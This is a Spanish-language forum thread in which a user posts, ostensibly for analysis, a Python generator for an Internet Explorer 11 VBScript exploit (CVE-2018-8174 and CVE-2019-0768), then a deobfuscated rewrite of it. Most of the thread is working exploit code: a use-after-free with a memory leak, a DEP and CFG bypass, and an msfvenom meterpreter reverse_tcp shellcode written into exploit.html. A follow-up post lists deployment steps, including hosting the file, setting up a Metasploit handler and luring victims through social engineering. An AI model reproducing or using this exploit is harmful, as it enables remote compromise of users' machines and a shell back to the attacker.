Analizando supuesto Exploit en VBScript y Python de Internet Explorer 11

Foro de elhacker.net

Seguridad Informática

Análisis y Diseño de Malware (Moderador: fary)

Analizando supuesto Exploit en VBScript y Python de Internet Explorer 11

0 Usuarios y 3 Visitantes están viendo este tema.

Páginas: [1]

Autor

Tema: Analizando supuesto Exploit en VBScript y Python de Internet Explorer 11 (Leído 2,811 veces)

Bad4m_cod3

Desconectado

Mensajes: 44

"a28ed83f69647d8f2a1046b9fa0e7c2c" H.P.Lovecraft

Analizando supuesto Exploit en VBScript y Python de Internet Explorer 11

« en: 9 Abril 2025, 20:12 pm »

Consegui este fragmento de codigo por un compañero. Lo dejo por aca para analizarlo con calma y poder trabajar con el sin abusar del Virtual Box.

Código

import sys
import subprocess
 
usage_text = """
 
Exploit Generator for CVE-2018-8174 & CVE-2019-0768
 
Prerequisite:
- Metasploit
- msfvenom
 
Usage: python ie11_vbscript.py [Listener IP] [Listener Port]
 
Instruction:
1. Use this script to generate "exploit.html"
2. Host the html file on your server
3. Setup a handler with windows/meterpreter/reverse_tcp in Metasploit
4. In your handler, set AutoRunScript with "post/windows/manage/migrate"
 
"""
 
if len(sys.argv) != 3:
   print usage_text
   sys.exit()
 
lhost = sys.argv[1]
lport = sys.argv[2]
#p = subprocess.call(["msfvenom","-p","windows/meterpreter/reverse_tcp","LHOST="+lhost])
p = subprocess.Popen(["msfvenom","-p","windows/meterpreter/reverse_tcp","LHOST="+lhost,"LPORT="+lport,"-b","'\\x00'","-f","js_le"],stdout=subprocess.PIPE)
 
out = p.communicate()
result = out[0]
payload = """
 
<!doctype html>
<html lang=\"en\">
<head>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">
<meta http-equiv=\"x-ua-compatible\" content=\"IE=5\">
<meta http-equiv=\"Expires\" content=\"0\">
<meta http-equiv=\"Pragma\" content=\"no-cache\">
<meta http-equiv=\"Cache-control\" content=\"no-cache\">
<meta http-equiv=\"Cache\" content=\"no-cache\">
</head>
<body>
<script language=\"VBScript.Encode\">
Dim lIIl
Dim IIIlI(6),IllII(6)
Dim IllI
Dim IIllI(40)
Dim lIlIIl,lIIIll
Dim IlII
Dim llll,IIIIl
Dim llllIl,IlIIII
Dim NtContinueAddr,VirtualProtectAddr
 
IlII=195948557
lIlIIl=Unescape(\"%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000\")
lIIIll=Unescape(\"%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000\")
IllI=195890093
Function IIIII(Domain) 
	lIlII=0
	IllllI=0
	IIlIIl=0
	Id=CLng(Rnd*1000000)
	lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
	If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
		lIlII=lIlII-(&h86d+6447-&H219b)
	End If
 
	IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
	IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
	IIIII=Domain &\"?\" &Chr(IllllI) &\"=\" &Id &\"&\" &Chr(IIlIIl) &\"=\" &lIlII
End Function
 
Function lIIII(ByVal lIlIl)
	IIll=\"\"
	For index=0 To Len(lIlIl)-1
		IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
	Next
	IIll=IIll &\"00\"
	If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
		IIll=IIll &\"00\"
	End If
	For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
		lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
		lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
		lIIII=lIIII &\"%u\" &lIlIll &lIIIlI
	Next
End Function
Function lIlI(ByVal Number,ByVal Length)
	IIII=Hex(Number)
	If Len(IIII)<Length Then
		IIII=String(Length-Len(IIII),\"0\") &IIII    \'pad allign with zeros 
	Else
		IIII=Right(IIII,Length)
	End If
	lIlI=IIII
End Function
Function GetUint32(lIII)
	Dim value
	llll.mem(IlII+8)=lIII+4
	llll.mem(IlII)=8		\'type string
	value=llll.P0123456789
	llll.mem(IlII)=2
	GetUint32=value
End Function
Function IllIIl(lIII)
	IllIIl=GetUint32(lIII) And (131071-65536)
End Function
Function lllII(lIII)
	lllII=GetUint32(lIII)  And (&h17eb+1312-&H1c0c)
End Function
Sub llllll
End Sub
Function GetMemValue
	llll.mem(IlII)=(&h713+3616-&H1530)
	GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))
End Function
Sub SetMemValue(ByRef IlIIIl)
	llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl
End Sub
Function LeakVBAddr
	On Error Resume Next
	Dim lllll
	lllll=llllll
	lllll=null
	SetMemValue lllll
	LeakVBAddr=GetMemValue()
End Function
Function GetBaseByDOSmodeSearch(IllIll)
	Dim llIl
	llIl=IllIll And &hffff0000
	Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692
		llIl=llIl-65536
	Loop
	GetBaseByDOSmodeSearch=llIl
End Function
Function StrCompWrapper(lIII,llIlIl)
	Dim lIIlI,IIIl
	lIIlI=\"\"
	For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
		lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
	Next
	StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
End Function
Function GetBaseFromImport(base_address,name_input)
	Dim import_rva,nt_header,descriptor,import_dir
	Dim IIIIII
	nt_header=GetUint32(base_address+(&h3c))
	import_rva=GetUint32(base_address+nt_header+&h80)
	import_dir=base_address+import_rva
	descriptor=0
	Do While True
		Dim Name
		Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
		If Name=0 Then
			GetBaseFromImport=&hBAAD0000
			Exit Function
		Else
			If StrCompWrapper(base_address+Name,name_input)=0 Then
				Exit Do
			End If
		End If
		descriptor=descriptor+1
	Loop
	IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
	GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
End Function
 
Function GetProcAddr(dll_base,name)
	Dim p,export_dir,index
	Dim function_rvas,function_names,function_ordin
	Dim Illlll
	p=GetUint32(dll_base+&h3c)
	p=GetUint32(dll_base+p+&h78)
	export_dir=dll_base+p
 
	function_rvas=dll_base+GetUint32(export_dir+&h1c)
	function_names=dll_base+GetUint32(export_dir+&h20)
	function_ordin=dll_base+GetUint32(export_dir+&h24)
	index=0
	Do While True
		Dim lllI
		lllI=GetUint32(function_names+index*4)
		If StrCompWrapper(dll_base+lllI,name)=0 Then
			Exit Do
		End If
		index=index+1
	Loop
	Illlll=IllIIl(function_ordin+index*2)
	p=GetUint32(function_rvas+Illlll*4)
	GetProcAddr=dll_base+p
End Function
 
Function GetShellcode()
	IIlI=Unescape(\"%u0000%u0000%u0000%u0000\") &Unescape(\"{shellcode}\" &lIIII(IIIII(\"\")))
	IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape(\"%u4141\"))
	GetShellcode=IIlI
End Function
Function EscapeAddress(ByVal value)
	Dim High,Low
	High=lIlI((value And &hffff0000)/&h10000,4)
	Low=lIlI(value And &hffff,4)
	EscapeAddress=Unescape(\"%u\" &Low &\"%u\" &High)
End Function
Function lIllIl
	Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI
	IlllI=lIlI(NtContinueAddr,8)
	IlIII=Mid(IlllI,1,2)
	llllI=Mid(IlllI,3,2)
	llIII=Mid(IlllI,5,2)
	lIllI=Mid(IlllI,7,2)
	IIlI=\"\"
	IIlI=IIlI &\"%u0000%u\" &lIllI &\"00\"
	For IIIl=1 To 3
		IIlI=IIlI &\"%u\" &llllI &llIII
		IIlI=IIlI &\"%u\" &lIllI &IlIII
	Next
	IIlI=IIlI &\"%u\" &llllI &llIII
	IIlI=IIlI &\"%u00\" &IlIII
	lIllIl=Unescape(IIlI)
End Function
Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) \'bypass cfg
	Dim IIlI
	IIlI=String((100334-65536),Unescape(\"%u4141\"))
	IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
	IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
	IIlI=IIlI &EscapeAddress(&h3000)
	IIlI=IIlI &EscapeAddress(&h40)
	IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)
	IIlI=IIlI &String(6,Unescape(\"%u4242\"))
	IIlI=IIlI &lIllIl()
	IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape(\"%u4141\"))
	WrapShellcodeWithNtContinueContext=IIlI
End Function
Function ExpandWithVirtualProtect(lIlll)
	Dim IIlI
	Dim lllllI
	lllllI=lIlll+&h23
	IIlI=\"\"
	IIlI=IIlI &EscapeAddress(lllllI)
	IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape(\"%4141\"))
	IIlI=IIlI &EscapeAddress(VirtualProtectAddr)
	IIlI=IIlI &EscapeAddress(&h1b)
	IIlI=IIlI &EscapeAddress(0)
	IIlI=IIlI &EscapeAddress(lIlll)
	IIlI=IIlI &EscapeAddress(&h23)
	IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape(\"%u4343\"))
	ExpandWithVirtualProtect=IIlI
End Function
Sub ExecuteShellcode
	llll.mem(IlII)=&h4d \'DEP bypass
	llll.mem(IlII+8)=0
    msgbox(IlII)		\'VT replaced
End Sub
 
Class cla1
Private Sub Class_Terminate()
	Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))
	IllI=IllI+(&h14b5+2725-&H1f59)
	lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
End Sub
 
End Class
 
Class cla2
Private Sub Class_Terminate()
	Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))
	IllI=IllI+(&h880+542-&Ha9d)
	lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
End Sub
End Class
 
Class IIIlIl
End Class
 
Class llIIl
Dim mem
Function P
End Function
Function SetProp(Value)
	mem=Value
	SetProp=0
End Function
End Class
 
Class IIIlll
Dim mem
Function P0123456789
	P0123456789=LenB(mem(IlII+8))
End Function
Function SPP
End Function
End Class
 
Class lllIIl
Public Default Property Get P
Dim llII
P=174088534690791e-324
For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
	IIIlI(IIIl)=(&h2176+711-&H243d)
Next
Set llII=New IIIlll
llII.mem=lIlIIl
For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
	Set IIIlI(IIIl)=llII
Next
End Property
End Class
 
Class llllII
Public Default Property Get P
Dim llII
P=636598737289582e-328
For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
	IllII(IIIl)=(&h442+2598-&He68)
Next
Set llII=New IIIlll
llII.mem=lIIIll
For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
	Set IllII(IIIl)=llII
Next
End Property
End Class
 
Set llllIl=New lllIIl
Set IlIIII=New llllII
Sub UAF
	For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
		Set IIllI(IIIl)=New IIIlIl
	Next
	For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
		Set IIllI(IIIl)=New llIIl
	Next
	IllI=0
	For IIIl=0 To 6
		ReDim lIIl(1)
		Set lIIl(1)=New cla1
		Erase lIIl
	Next
	Set llll=New llIIl
	IllI=0
	For IIIl=0 To 6
		ReDim lIIl(1)
		Set lIIl(1)=New cla2
		Erase lIIl
	Next
	Set IIIIl=New llIIl
End Sub
Sub InitObjects
	llll.SetProp(llllIl)
	IIIIl.SetProp(IlIIII)
	IlII=IIIIl.mem
End Sub
 
Sub StartExploit
	UAF
	InitObjects
	vb_adrr=LeakVBAddr()
	//Alert \"CScriptEntryPointObject Leak: 0x\" & Hex(vb_adrr) & vbcrlf & \"VirtualTable address: 0x\" & Hex(GetUint32(vb_adrr))
	vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
	//Alert \"VBScript Base: 0x\" & Hex(vbs_base) 
	msv_base=GetBaseFromImport(vbs_base,\"msvcrt.dll\")
	//Alert \"MSVCRT Base: 0x\" & Hex(msv_base) 
	krb_base=GetBaseFromImport(msv_base,\"kernelbase.dll\")
	//Alert \"KernelBase Base: 0x\" & Hex(krb_base) 
	ntd_base=GetBaseFromImport(msv_base,\"ntdll.dll\")
	//Alert \"Ntdll Base: 0x\" & Hex(ntd_base) 
	VirtualProtectAddr=GetProcAddr(krb_base,\"VirtualProtect\")
	//Alert \"KernelBase!VirtualProtect Address 0x\" & Hex(VirtualProtectAddr) 
	NtContinueAddr=GetProcAddr(ntd_base,\"NtContinue\")
	//Alert \"KernelBase!VirtualProtect Address 0x\" & Hex(NtContinueAddr) 
	SetMemValue GetShellcode()
	ShellcodeAddr=GetMemValue()+8
	//Alert \"Shellcode Address 0x\" & Hex(ShellcodeAddr) 
	SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
	lIlll=GetMemValue()+69596
	SetMemValue ExpandWithVirtualProtect(lIlll)
	llIIll=GetMemValue()
	ExecuteShellcode
	Alert \"Executing Shellcode\"
End Sub
StartExploit
</script>
</body>
</html>
 
""".format(shellcode=result)
 
f = open("exploit.html", "w")
f.write(payload)

Aun no se que hace exactamente, pero me tomare el tiempo de decodificarlo y analizarlo bien.
Saludos


	En línea

809219e8548c7feaa7cf844281a1d8e4a85f37bd34cc3839cf6498aaaa23dc8c
(Bad4m_cod3 estuvo aqui.)

Bad4m_cod3

Desconectado

Mensajes: 44

"a28ed83f69647d8f2a1046b9fa0e7c2c" H.P.Lovecraft

Re: Analizando supuesto Exploit en VBScript y Python de Internet Explorer 11

« Respuesta #1 en: 10 Abril 2025, 00:09 am »

Información del exploit

Nombre Descriptivo: IE11 VBScript Exploit
Exploit Generator for CVE-2018-8174 & CVE-2019-0768 (RCE via VBScript Execution in IE11)
Credito: https://www.exploit-db.com/exploits/44741
CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-0768, https://nvd.nist.gov/vuln/detail/CVE-2018-8174

Instruciones de uso

1. Usar el Script generado "exploit.html"
2. Host del fichero HTML es tu servidor
3. Configurar con windows/meterpreter/reverse_tcp en Metasploit
4. set AutoRunScript en "post/windows/manage/migrate"
5. usar ataque de ingenieria social para el payload url

Saludos


	En línea

809219e8548c7feaa7cf844281a1d8e4a85f37bd34cc3839cf6498aaaa23dc8c
(Bad4m_cod3 estuvo aqui.)

Bad4m_cod3

Desconectado

Mensajes: 44

"a28ed83f69647d8f2a1046b9fa0e7c2c" H.P.Lovecraft

Re: Analizando supuesto Exploit en VBScript y Python de Internet Explorer 11

« Respuesta #2 en: 25 Abril 2025, 19:06 pm »

Codigo Decodificado

Analizando y reescribiendo las variables eliminando la molesta ofuscacion podemos entender mejor la funcionalidad del mismo. Pues bien, aunque ya existe documentacion no esta demas investigar y profundizar realizando algo de ingenieria inversa.

Código

 
import sys
import subprocess
 
usage_text = """
Exploit Generator for CVE-2018-8174 & CVE-2019-0768
 
Prerequisite:
- Metasploit
- msfvenom
 
Usage: python ie11_vbscript.py [Listener IP] [Listener Port]
 
Instruction:
1. Use this script to generate "exploit.html"
2. Host the html file on your server
3. Setup a handler with windows/meterpreter/reverse_tcp in Metasploit
4. In your handler, set AutoRunScript with "post/windows/manage/migrate"
"""
 
if len(sys.argv) != 3:
    print(usage_text)
    sys.exit()
 
listener_ip = sys.argv[1]
listener_port = sys.argv[2]
process = subprocess.Popen(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=" + listener_ip, "LPORT=" + listener_port, "-b", "'\\x00'", "-f", "js_le"], stdout=subprocess.PIPE)
 
output = process.communicate()
payload_result = output[0]
payload = """
<!doctype html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="x-ua-compatible" content="IE=5">
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-control" content="no-cache">
<meta http-equiv="Cache" content="no-cache">
</head>
<body>
<script language="VBScript.Encode">
(Exploit Code VBScript)
</script>
</body>
</html>
"""
 
with open("exploit.html", "w") as f:
    f.write(payload)

En "(Exploit Code VBScript)" esta etiqueta no es mas que el codigo VBScript con variables renombradas acontinuación.

Código

Dim scriptVariable
Dim array1(6), array2(6)
Dim someVariable
Dim memoryArray(40)
Dim address1, address2
Dim variable1
Dim counter1, counter2
Dim variable2, variable3
Dim continueAddress, virtualProtectAddress
 
variable1 = 195948557
address1 = Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
address2 = Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
someVariable = 195890093
 
Function generateQuery(Domain)
    scriptVariable = 0
    randomValue1 = 0
    randomValue2 = 0
    randomId = CLng(Rnd * 1000000)
    scriptVariable = CLng((&h27d + 8231 - &H225b) * Rnd) Mod (&h137d + 443 - &H152f) + (&h1c17 + 131 - &H1c99)
    If (randomId + scriptVariable) Mod (&h5c0 + 6421 - &H1ed3) = (&h10ba + 5264 - &H254a) Then
        scriptVariable = scriptVariable - (&h86d + 6447 - &H219b)
    End If
 
    randomValue1 = CLng((&h2bd + 6137 - &H1a6d) * Rnd) Mod (&h769 + 4593 - &H1940) + (&h1a08 + 2222 - &H2255)
    randomValue2 = CLng((&h14e6 + 1728 - &H1b5d) * Rnd) Mod (&hfa3 + 1513 - &H1572) + (&h221c + 947 - &H256e)
    generateQuery = Domain & "?" & Chr(randomValue1) & "=" & randomId & "&" & Chr(randomValue2) & "=" & scriptVariable
End Function
 
Function encodeString(ByVal inputString)
    Dim encodedString
    encodedString = ""
    For index = 0 To Len(inputString) - 1
        encodedString = encodedString & convertToHex(Asc(Mid(inputString, index + 1, 1)), 2)
    Next
    encodedString = encodedString & "00"
    If Len(encodedString) / (&h15c6 + 3068 - &H21c0) Mod (&h1264 + 2141 - &H1abf) = (&hc93 + 6054 - &H2438) Then
        encodedString = encodedString & "00"
    End If
    For i = (&h1a1a + 3208 - &H26a2) To Len(encodedString) / (&h1b47 + 331 - &H1c8e) - (&h14b2 + 4131 - &H24d4)
        part1 = Mid(encodedString, i * (&h576 + 1268 - &Ha66) + (&ha64 + 6316 - &H230f), (&ha49 + 1388 - &Hfb3))
        part2 = Mid(encodedString, i * (&hf82 + 3732 - &H1e12) + (&h210 + 2720 - &Hcaf) + (&h4fa + 5370 - &H19f2), (&hf82 + 5508 - &H2504))
        encodeString = encodeString & "%u" & part2 & part1
    Next
End Function
 
Function getUint32(value)
    Dim result
    memoryArray.mem(variable1 + 8) = value + 4
    result = memoryArray.mem(variable1)
    memoryArray.mem(variable1) = 2
    getUint32 = result
End Function
 
Function leakVBScriptAddress()
    On Error Resume Next
    Dim temp
    temp = someVariable
    temp = null
    setMemoryValue temp
    leakVBScriptAddress = getMemoryValue()
End Function
 
Function getBaseAddressByDOSmodeSearch(importAddress)
    Dim baseAddress
    baseAddress = importAddress And &hffff0000
    Do While getUint32(baseAddress + (&h748 + 4239 - &H176f)) <> 544106784 Or getUint32(baseAddress + (&ha2a + 7373 - &H268b)) <> 542330692
        baseAddress = baseAddress - 65536
    Loop
    getBaseAddressByDOSmodeSearch = baseAddress
End Function
 
Function compareStringsWrapper(value1, value2)
    Dim tempString
    tempString = ""
    For i = (&ha2a + 726 - &Hd00) To Len(value2) - (&h2e1 + 5461 - &H1835)
        tempString = tempString & Chr(getUint32(value1 + i))
    Next
    compareStringsWrapper = StrComp(UCase(tempString), UCase(value2))
End Function
 
Function getBaseFromImport(baseAddress, dllName)
    Dim importRVA, ntHeader, descriptor, importDirectory
    Dim functionAddress
    ntHeader = getUint32(baseAddress + (&h3c))
    importRVA = getUint32(baseAddress + ntHeader + &h80)
    importDirectory = baseAddress + importRVA
    descriptor = 0
    Do While True
        Dim name
        name = getUint32(importDirectory + descriptor * (&h14) + &hc)
        If name = 0 Then
            getBaseFromImport = &hBAAD0000
            Exit Function
        Else
            If compareStringsWrapper(baseAddress + name, dllName) = 0 Then
                Exit Do
            End If
        End If
        descriptor = descriptor + 1
    Loop
    functionAddress = getUint32(importDirectory + descriptor * (&h14) + &h10)
    getBaseFromImport = getBaseAddressByDOSmodeSearch(getUint32(baseAddress + functionAddress))
End Function
 
Function getProcAddress(dllBase, functionName)
    Dim exportDirectory, index
    Dim functionRVAs, functionNames, functionOrdinals
    Dim functionAddress
    exportDirectory = getUint32(dllBase + &h3c)
    exportDirectory = getUint32(dllBase + exportDirectory + &h78)
    exportDirectory = dllBase + exportDirectory
 
    functionRVAs = dllBase + getUint32(exportDirectory + &h1c)
    functionNames = dllBase + getUint32(exportDirectory + &h20)
    functionOrdinals = dllBase + getUint32(exportDirectory + &h24)
    index = 0
    Do While True
        Dim functionNameAddress
        functionNameAddress = getUint32(functionNames + index * 4)
        If compareStringsWrapper(dllBase + functionNameAddress, functionName) = 0 Then
            Exit Do
        End If
        index = index + 1
    Loop
    functionAddress = getUint32(functionOrdinals + index * 2)
    getProcAddress = dllBase + functionAddress
End Function
 
Function getShellcode()
    Dim shellcode
    shellcode = Unescape("%u0000%u0000%u0000%u0000") & Unescape("{shellcode}" & encodeString(generateQuery("")))
    shellcode = shellcode & String((&h80000 - LenB(shellcode)) / 2, Unescape("%u4141"))
    getShellcode = shellcode
End Function
 
Function escapeAddress(ByVal value)
    Dim highPart, lowPart
    highPart = convertToHex((value And &hffff0000) / &h10000, 4)
    lowPart = convertToHex(value And &hffff, 4)
    escapeAddress = Unescape("%u" & lowPart & "%u" & highPart)
End Function
 
Function prepareShellcode()
    Dim shellcodeString, part1, part2, part3, part4
    part1 = convertToHex(continueAddress, 8)
    part2 = Mid(part1, 1, 2)
    part3 = Mid(part1, 3, 2)
    part4 = Mid(part1, 5, 2)
    shellcodeString = ""
    shellcodeString = shellcodeString & "%u0000%u" & part4 & "00"
    For i = 1 To 3
        shellcodeString = shellcodeString & "%u" & part3 & part2
        shellcodeString = shellcodeString & "%u" & part4 & part2
    Next
    shellcodeString = shellcodeString & "%u" & part3 & part2
    shellcodeString = shellcodeString & "%u00" & part2
    prepareShellcode = Unescape(shellcodeString)
End Function
 
Function wrapShellcodeWithNtContinueContext(shellcodeAddress)
    Dim shellcodeWrapper
    shellcodeWrapper = String((100334 - 65536), Unescape("%u4141"))
    shellcodeWrapper = shellcodeWrapper & escapeAddress(shellcodeAddress)
    shellcodeWrapper = shellcodeWrapper & escapeAddress(shellcodeAddress)
    shellcodeWrapper = shellcodeWrapper & escapeAddress(&h3000)
    shellcodeWrapper = shellcodeWrapper & escapeAddress(&h40)
    shellcodeWrapper = shellcodeWrapper & escapeAddress(shellcodeAddress - 8)
    shellcodeWrapper = shellcodeWrapper & String(6, Unescape("%u4242"))
    shellcodeWrapper = shellcodeWrapper & prepareShellcode()
    shellcodeWrapper = shellcodeWrapper & String((&h80000 - LenB(shellcodeWrapper)) / 2, Unescape("%u4141"))
    wrapShellcodeWithNtContinueContext = shellcodeWrapper
End Function
 
Function expandWithVirtualProtect(shellcodeLocation)
    Dim virtualProtectExpansion
    Dim adjustedLocation
    adjustedLocation = shellcodeLocation + &h23
    virtualProtectExpansion = ""
    virtualProtectExpansion = virtualProtectExpansion & escapeAddress(adjustedLocation)
    virtualProtectExpansion = virtualProtectExpansion & String((&hb8 - LenB(virtualProtectExpansion)) / 2, Unescape("%4141"))
    virtualProtectExpansion = virtualProtectExpansion & escapeAddress(virtualProtectAddress)
    virtualProtectExpansion = virtualProtectExpansion & escapeAddress(&h1b)
    virtualProtectExpansion = virtualProtectExpansion & escapeAddress(0)
    virtualProtectExpansion = virtualProtectExpansion & escapeAddress(shellcodeLocation)
    virtualProtectExpansion = virtualProtectExpansion & escapeAddress(&h23)
    virtualProtectExpansion = virtualProtectExpansion & String((&400 - LenB(virtualProtectExpansion)) / 2, Unescape("%u4343"))
    expandWithVirtualProtect = virtualProtectExpansion
End Function
 
Sub executeShellcode()
    memoryArray.mem(variable1) = &h4D ' DEP bypass
    memoryArray.mem(variable1 + 8) = 0
    msgbox(variable1) ' VT replaced
End Sub
 
Class Class1
    Private Sub Class_Terminate()
        Set array1(IllI) = allocateMemory((&h1078 + 5473 - &H25d8))
        IllI = IllI + (&h14b5 + 2725 - &H1f59)
        allocateMemory((&h79a + 3680 - &H15f9)) = (&h69c + 1650 - &Hd0d)
    End Sub
End Class
 
Class Class2
    Private Sub Class_Terminate()
        Set array2(IllI) = allocateMemory((&h15b + 3616 - &Hf7a))
        IllI = IllI + (&h880 + 542 - &Ha9d)
        allocateMemory((&h1f75 + 342 - &H20ca)) = (&had3 + 3461 - &H1857)
    End Sub
End Class
 
Class Class3
End Class
 
Class MemoryClass
    Dim memory
    Function P
    End Function
    Function SetProperty(Value)
        memory = Value
        SetProperty = 0
    End Function
End Class
 
Class MemoryAccessClass
    Dim memory
    Function GetMemoryLength
        GetMemoryLength = LenB(memory(variable1 + 8))
    End Function
    Function SPP
    End Function
End Class
 
Class MemoryHandlerClass
    Public Default Property Get P
        Dim temp
        P = 174088534690791e-324
        For i = (&h7a0 + 4407 - &H18d7) To (&h2eb + 1143 - &H75c)
            array1(i) = (&h2176 + 711 - &H243d)
        Next
        Set temp = New MemoryAccessClass
        temp.memory = address1
        For i = (&h1729 + 3537 - &H24fa) To (&h1df5 + 605 - &H204c)
            Set array1(i) = temp
        Next
    End Property
End Class
 
Class MemoryHandlerClass2
    Public Default Property Get P
        Dim temp
        P = 636598737289582e-328
        For i = (&h1063 + 2314 - &H196d) To (&h4ac + 2014 - &Hc84)
            array2(i) = (&h442 + 2598 - &He68)
        Next
        Set temp = New MemoryAccessClass
        temp.memory = address2
        For i = (&h7eb + 3652 - &H162f) To (&h3e8 + 1657 - &Ha5b)
            Set array2(i) = temp
        Next
    End Property
End Class
 
Set memoryHandler1 = New MemoryHandlerClass
Set memoryHandler2 = New MemoryHandlerClass2
 
Sub useAfterFree()
    For i = (&hfe8 + 3822 - &H1ed6) To (&h8b + 8633 - &H2233)
        Set array1(i) = New Class1
    Next
    For i = (&haa1 + 6236 - &H22e9) To (&h1437 + 3036 - &H1fed)
        Set array1(i) = New Class2
    Next
    IllI = 0
    For i = 0 To 6
        ReDim array1(1)
        Set array1(1) = New Class1
        Erase array1
    Next
    Set memoryHandler = New MemoryClass
    IllI = 0
    For i = 0 To 6
        ReDim array1(1)
        Set array1(1) = New Class2
        Erase array1
    Next
    Set memoryHandler2 = New MemoryClass
End Sub
 
Sub initializeObjects()
    memoryHandler.SetProperty(memoryHandler1)
    memoryHandler2.SetProperty(memoryHandler2)
    variable1 = memoryHandler2.memory
End Sub
 
Sub startExploit()
    useAfterFree()
    initializeObjects()
    vbScriptAddress = leakVBScriptAddress()
    ' Alert "CScriptEntryPointObject Leak: 0x" & Hex(vbScriptAddress) & vbcrlf & "VirtualTable address: 0x" & Hex(getUint32(vbScriptAddress))
    vbScriptBase = getBaseAddressByDOSmodeSearch(getUint32(vbScriptAddress))
    ' Alert "VBScript Base: 0x" & Hex(vbScriptBase)
    msvcrtBase = getBaseFromImport(vbScriptBase, "msvcrt.dll")
    ' Alert "MSVCRT Base: 0x" & Hex(msvcrtBase)
    kernelBase = getBaseFromImport(msvcrtBase, "kernelbase.dll")
    ' Alert "KernelBase Base: 0     
' Alert "KernelBase Base: 0x" & Hex(kernelBase)
    ntdllBase = getBaseFromImport(msvcrtBase, "ntdll.dll")
    ' Alert "Ntdll Base: 0x" & Hex(ntdllBase)
    virtualProtectAddress = getProcAddress(kernelBase, "VirtualProtect")
    ' Alert "KernelBase!VirtualProtect Address 0x" & Hex(virtualProtectAddress)
    ntContinueAddress = getProcAddress(ntdllBase, "NtContinue")
    ' Alert "KernelBase!NtContinue Address 0x" & Hex(ntContinueAddress)
 
    setMemoryValue getShellcode()
    shellcodeAddress = getMemoryValue() + 8
    ' Alert "Shellcode Address 0x" & Hex(shellcodeAddress)
    setMemoryValue wrapShellcodeWithNtContinueContext(shellcodeAddress)
    locationToExpand = getMemoryValue() + 69596
    setMemoryValue expandWithVirtualProtect(locationToExpand)
    finalMemoryValue = getMemoryValue()
    executeShellcode
    Alert "Executing Shellcode"
End Sub
 
startExploit()

En el proximo mensaje describo a detalle los datos de funcionamiento y si logro entenderlo la explicación detallada.

Saludos Black Hacker


	En línea

809219e8548c7feaa7cf844281a1d8e4a85f37bd34cc3839cf6498aaaa23dc8c
(Bad4m_cod3 estuvo aqui.)

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Exploit para una vulnerabilidad 0-Day en Internet Explorer « 1 2 » Noticias	Novlucker	11	6,494	30 Diciembre 2010, 20:30 pm por shinigami_rem
	Exploit aurora internet explorer en maquina virtual Bugs y Exploits	dairus20	3	4,176	29 Abril 2011, 14:54 pm por dairus20
	Internet Explorer 10 frente a Internet Explorer 9. Pruebas de rendimiento en ... Noticias	wolfbcn	0	2,113	27 Febrero 2013, 18:42 pm por wolfbcn
